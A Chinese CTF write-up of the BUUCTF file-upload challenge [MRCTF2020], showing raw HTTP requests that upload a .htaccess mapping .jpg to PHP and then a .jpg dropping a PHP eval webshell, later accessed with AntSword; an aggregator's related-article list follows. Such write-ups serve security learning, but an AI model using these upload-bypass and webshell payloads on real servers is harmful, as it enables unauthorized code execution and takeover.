[MRCTF2020]你传你呢

news/2025/1/9 12:54:48/文章来源:https://www.cnblogs.com/imtaieee/p/18522721

题目链接:https://buuoj.cn/challenges#[MRCTF2020]你传你🐎呢

打开环境后如下所示。

可以看到,这是一道文件上传题,直接对可上传的文件类型进行 fuzzing。

通过 fuzzing 发现,可以上传 .jpg、.html、.htaccess 文件,PHP 相关的文件均无法上传。

因此,可以选择上传 .htaccess 文件,让后端将所有 .jpg 文件都当作 PHP 文件进行处理。

POST /upload.php HTTP/1.1
Host: ef0c8be9-fc2c-42a1-a906-f93b2c596bcb.node5.buuoj.cn:81
Content-Length: 364
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ef0c8be9-fc2c-42a1-a906-f93b2c596bcb.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2v4xskXML68xrlTI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ef0c8be9-fc2c-42a1-a906-f93b2c596bcb.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=eb6b066786f6c525d25fa39c406a4e7b
Connection: keep-alive------WebKitFormBoundary2v4xskXML68xrlTI
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png<IfModule mime_module>
AddType application/x-httpd-php .jpg
</IfModule>
------WebKitFormBoundary2v4xskXML68xrlTI
Content-Disposition: form-data; name="submit"一键去世
------WebKitFormBoundary2v4xskXML68xrlTI--

随后,上传一个写入 PHP Webshell 的 jpg 文件,让用户访问该 jpg 文件时,就生成 shell.php 文件。

POST /upload.php HTTP/1.1
Host: ef0c8be9-fc2c-42a1-a906-f93b2c596bcb.node5.buuoj.cn:81
Content-Length: 360
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ef0c8be9-fc2c-42a1-a906-f93b2c596bcb.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2v4xskXML68xrlTI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ef0c8be9-fc2c-42a1-a906-f93b2c596bcb.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=eb6b066786f6c525d25fa39c406a4e7b
Connection: keep-alive------WebKitFormBoundary2v4xskXML68xrlTI
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/png<?php fputs(fopen("./shell.php", "w"), '<?php @eval($_POST[cmd]) ?>'); ?>
------WebKitFormBoundary2v4xskXML68xrlTI
Content-Disposition: form-data; name="submit"一键去世
------WebKitFormBoundary2v4xskXML68xrlTI--

随后,使用 AntSword 进行连接,但是不知为什么,无法使用终端模式,但可以进行文件管理。在根目录即可找到 flag 文件。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/825964.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Deswing :图形化Java反序列化利用工具

Deswing :图形化Java反序列化利用工具

原创 GSDK安全团队免责声明 工具仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。信息及工具收集于互联网,真实性及安全性自测!!!项目地址 https://github.com/0ofo/Deswing项目介绍 这是一个Java反序…
阅读更多...
【Linux安全】Shellcoding

【Linux安全】Shellcoding

原创 haidragon 安全狗的自我修养“面向安全专业人员的 Linux Shellcoding” 今天我们将学习 Linux Shellcoding 并学习实践知识。 shell代码 编写 shellcode 是了解有关汇编语言以及程序如何与操作系统交互的更多信息的好方法。 为什么红队成员和渗透测试人员编写 shellcode?…
阅读更多...
[极客大挑战 2019]Http

[极客大挑战 2019]Http

题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Http。 访问环境如下。该页面的响应包如下。 HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 16:21:45 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 4065 Connection: close Content-Type:…
阅读更多...
Matlab 2024下载与安装(包含授权激活)

Matlab 2024下载与安装(包含授权激活)

1、安装包Matlab 2024 B: 链接:https://pan.quark.cn/s/f56eda425e79 提取码:daQZ Matlab 2023B: 链接:https://pan.quark.cn/s/6b597a439f49 提取码:c3XR Matlab R2022 a: 链接:https://pan.quark.cn/s/4a8cf5260d20 提取码:QyKG 2、安装教程 1) 解压压缩包文件…
阅读更多...
[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]Upload。 打开环境,如下所示。通过页面源代码可以发现,该网站系 PHP 架构,因此尝试直接上传一句话木马。发现提示 "NOT!php!",因此尝试 fuzzing 一下后缀名。发现网站可以通过了 "phtml" 的后…
阅读更多...
[SUCTF 2019]EasySQL

[SUCTF 2019]EasySQL

题目链接:https://buuoj.cn/challenges#[SUCTF 2019]EasySQL 打开环境后,如下所示。尝试输入字符:1。尝试输入字符:0 后,发现没有输出结果。尝试输入字符串 "aaa"、"bbb" 等后,发现都跟输入 0 的结果一致,而输入 123、456 等非 0 的内容,都与输入 …
阅读更多...
[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL

题目链接:https://buuoj.cn/challenges#[极客大挑战 2019]LoveSQL。 打开环境后,如下所示。尝试 SQL 注入(万能密码)。 Payload:admin+or+1%3d1%3b%23。(笔者通过简单粗暴的尝试:①没有使用单引号;②使用单引号;③使用双引号,来确定后端拼接的 SQL 语句中的 password…
阅读更多...
2024软工现场编程实践

2024软工现场编程实践

作业所属课程 https://edu.cnblogs.com/campus/fzu/SE2024作业要求 https://edu.cnblogs.com/campus/fzu/SE2024/homework/13302作业的目标 在三个小时内编写出一个个人记账本,用户可以对自己平时的收入和支出情况进行简单的记录,查看和统计团队名称 “研途无忧”团队成员学号…
阅读更多...
2024软工实践

2024软工实践

作业所属课程 https://edu.cnblogs.com/campus/fzu/SE2024作业要求 https://edu.cnblogs.com/campus/fzu/SE2024/homework/13302作业的目标 在三个小时内编写出一个个人记账本,用户可以对自己平时的收入和支出情况进行简单的记录,查看和统计团队名称 “研途无忧”团队成员学号…
阅读更多...
Winform在主窗体里切换多个窗体

Winform在主窗体里切换多个窗体

1.点击解决方案资源管理器的项目名称,右键添加用户控件(Windows窗体)。2.在主窗体代码中实例化添加的用户控件(Windows窗体)。3.在主窗体界面中添加pane控件,该控件的大小就是要切换的界面大小,然后在主窗体代码中将实例化的用户控件(Windows窗体)添加到pane控件的集合…
阅读更多...
目前遇到过的编码

目前遇到过的编码

Base家族 base16 由大写字母(A-Z)和数字(0-9)组成,通常不需要“=”填充 base32 由(A-Z、2-7)32个可见字符构成,“=”符号用作后缀填充 例:NZXV64DBONZXO33SMQ====== KVEEQRSCI5DVKVSXKZEUQS2FJBKE2WKKGI2EKNCWJFCUQNSKIVAVINBTKVKE2TZUKVHUWRZWGRIVSVSNJZJFIQKNIZLDIN…
阅读更多...
NOI LINUX 系统终端常用操作

NOI LINUX 系统终端常用操作

打开终端 我们可以右键空白处 - 在终端中打开(Open in Terminal)/Ctrl+Alt+T 快捷键打开终端。 考试时编译、运行、调试、对拍、测大样例等行为的操作 对于一个 C++ 可执行文件 1.cpp 为例:编译: g++ 1.cpp -o qwq,其中 1.cpp 可替换为任意 C++ 可执行文件,qwq 表示已编译…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023